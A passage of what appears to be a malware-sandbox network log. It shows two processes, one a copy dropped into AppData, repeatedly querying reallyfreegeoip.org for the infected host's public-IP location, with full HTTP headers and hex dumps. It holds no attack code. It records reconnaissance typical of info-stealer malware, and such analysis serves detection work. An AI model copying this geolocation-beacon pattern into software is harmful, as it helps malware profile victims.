States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49748	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:16 UTC	886	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344165 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPXvIO4hbOBOyhKreajfCyq6SpEJ1%2B0HFCzBYNAOJaHDCcSUdXLKT%2F%2B76zVY%2F0bOaExmyHVJUJbj1MmllslaKxRWD4esW3sI1bI8%2BnTNSZd3vdaxpv9%2B9j%2FbTC8KXH44cWau6%2BUY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcad7f544370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1617&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1784841&cwnd=231&unsent_bytes=0&cid=0efbb3f3ada0c949&ts=454&x=0"
2024-12-16 13:23:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49749	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-16 13:23:16 UTC	879	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344165 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrScGOrKZW1z3XvQnVYb0KzbzcZo9NbaJwZp5N6rxT%2Fc%2F6Tlz4xV1CtGxYnFaBGQZXX1I4v7dkP9dfSUJrV9sM3H40SL0mxFK5xFerCo2HS2b%2FpZlBMpD73r53b%2FVxH4SvBlKTiW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcae1d1e41a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4862&min_rtt=1629&rtt_var=2694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1792510&cwnd=239&unsent_bytes=0&cid=188d93fe352da4aa&ts=457&x=0"
2024-12-16 13:23:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49758	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:19 UTC	884	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344168 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbSMi%2FAYXLod14%2Fi4bPGz9mtIjv%2BaYY%2FymCCxHKj%2By7ebnODGTsdAvaGaK90OZyJCAf3dIGfYW46NeBpsnsbWbLiYnezl6euxYCvIOaq8gVyJ1yP%2FQKochhrRL9oV%2FSixGGQqg7X"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcc058aa4408-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1585&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1800246&cwnd=201&unsent_bytes=0&cid=95c24dd5c4c81f35&ts=463&x=0"
2024-12-16 13:23:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49759	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:19 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344168 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6twOCRMyFfbTaSFaeyYQ9CDPhjex7153FiJQ%2FCRxuQQDwERu1Ws6hfScc6JT5ZKZSH%2BTrvS1WDAJK10m2%2FN55O9xlZ5eMDib2Ra7XXe2R7DL5Xwz7n4UJhnBATZmt3EFc2niu0m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcc0d98432e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1819&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1593016&cwnd=160&unsent_bytes=0&cid=03481259860f7665&ts=455&x=0"
2024-12-16 13:23:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49769	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:22 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-16 13:23:22 UTC	874	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344171 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l6o3DKM7C87fVUKhgDdWGePSgdfyMtUB%2B6uvWn2GRloeR67zSdKro7FeS73rbbocqUzBT29tmIp27PkTntMrcu5%2FBu9D3GxFq1RGAeirxTc35pCGgJZOIZNy4c0J9IXGS0ChnUq8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcd31cf7438b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1594&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1813664&cwnd=169&unsent_bytes=0&cid=a68d89fc7f28fa46&ts=451&x=0"
2024-12-16 13:23:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49774	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:22 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:22 UTC	878	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344171 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Folkqrg2tkBYYl7tdqb8Ry%2FRN5ISeaSopM%2FJ9eJceb7cLjllYI9BNvd5glYpsTXJJwBovzje9HQg0gtgY0gctHrk6rFPqQ2RV8oBKykrjZX4E%2Bg%2BCpHl9FVPHaLqnuGdXoI6CGid"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcd39b4242ce-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2112&min_rtt=2112&rtt_var=793&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1378659&cwnd=233&unsent_bytes=0&cid=7af5904a76b29bf5&ts=463&x=0"
2024-12-16 13:23:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49781	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:25 UTC	872	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344174 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJyK4m1pZGEBthreccDl4C2CYpZBVWUHAiS5n7DY6E3%2BzfcOGXk7UNpVZlj5zPs8z8cC1YdX2IIJEZ7BSHQueafEsHu8ULvriEvgBZ0TiUyfcPDyrJDzbEloowWUE0RK8BivwkFg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efce5f9d2c445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1468&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1922317&cwnd=227&unsent_bytes=0&cid=59380cef180a6340&ts=453&x=0"
2024-12-16 13:23:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49782	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:25 UTC	874	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344174 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiRMtKWFSxcsNL0djnwxmNnDDdCIcQ5ryUx5v0gNk5cQ3irte0pjFVD7p9KfYmaK8ZNaUYgF5GHePmqT6BNBSwF4w1jdkAuKQsfoqTzG%2FXJKhZuVETOyW51BPF30QZ7fq%2Bn7FtiW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efce65e671a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1815&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1608815&cwnd=157&unsent_bytes=0&cid=3063a11fc2c16ce9&ts=450&x=0"
2024-12-16 13:23:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49790	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:28 UTC	874	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344177 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wrsjvnmATJ%2FDnQFsjb4TcrVxPyIII9hKdKQ%2F9TH0oAvCj8FNX9slqj4At3jcafnZU4gNNsqqA0wS5ZyCcdD6riwKnrfvP5kAkk7JHbs8m7SbY14djtMd4BrEYh4DSEnE3vLSI7uA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcf8ad3e8c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2047&rtt_var=777&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1399808&cwnd=235&unsent_bytes=0&cid=0b9ed38f0048d82f&ts=457&x=0"
2024-12-16 13:23:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49791	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:28 UTC	884	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344177 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pcgcuNDt9zA4TwJVEUnrf1zxKJhLTM%2BE4k1U1H9P%2BD9W4BXvLQj6Kxza2lFPh9EGG4md%2BlgiBi%2BfG%2F82eJIU2luADtRO0WBe6%2BrfqbsuktExoB2eLKZB1Us88Qje8lUaZ%2F3ZhWDt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efcf90dfede9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1506&rtt_var=570&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1908496&cwnd=209&unsent_bytes=0&cid=70fca72fabe85639&ts=452&x=0"
